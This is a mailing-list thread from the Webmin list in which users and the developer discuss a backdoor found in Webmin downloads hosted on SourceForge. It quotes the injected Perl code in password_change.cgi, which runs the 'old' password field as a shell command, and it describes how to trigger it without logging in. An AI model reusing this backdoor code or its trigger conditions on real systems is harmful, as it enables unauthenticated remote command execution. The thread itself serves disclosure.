Re: [webmin-l] Compromised Downloads

[Jamie C. <jca...@we...>]

Yes, you're right. Fortunately that option isn't on by default.  

On 17/Aug/2019 14:50 Adam Hostetler <ad...@gm...> wrote ..   To clarify my last email, you can run it without any auth cookie, and use any username and "old" password. The "new" passwords have to match so it gets that far, and passwd_mode=2 has to be set in miniserver.conf.   On Sat, Aug 17, 2019 at 5:47 PM Adam Hostetler <ad...@gm...> wrote:  From my testing you can exploit it without knowing the password or even a username  On Sat, Aug 17, 2019 at 5:35 PM Jamie Cameron <jca...@we...> wrote:  Thanks, I'm looking into this now. I'm guessing off hand that it's not remotely exploitable without an existing login since the password change cgi can't be run unless your already logged in.   On Aug 17, 2019 1:29 PM, Adam Hostetler <ad...@gm...> wrote:  I believe the downloads hosted by source forge are compromised. They contain a backdoor in the password_change.cgi, this is related to the "0day" a few days ago. The code does not appear in the current github r
 epo nor in any commits in the past.   Backdoor code: if ($wuser) {        # Update Webmin user's password        $enc = &acl::encrypt_password($in{'old'}, $wuser->{'pass'});        $enc eq $wuser->{'pass'} || &pass_error($text{'password_eold'},qx/$in{'old'}/);        $perr = &acl::check_password_restrictions($in{'user'}, $in{'new1'});        $perr && &pass_error(&text('password_enewpass', $perr));        $wuser->{'pass'} = &acl::encrypt_password($in{'new1'});  "old" password is passed to qx, which executes it as a system command  See https://www.reddit.com/r/netsec/comments/crk77z/0day_remote_code_execution_for_webmin/    - Forwarded by the Webmin mailing list at web...@li... To remove yourself from this list, go to http://lists.sourceforge.net/lists/listinfo/webadmin-list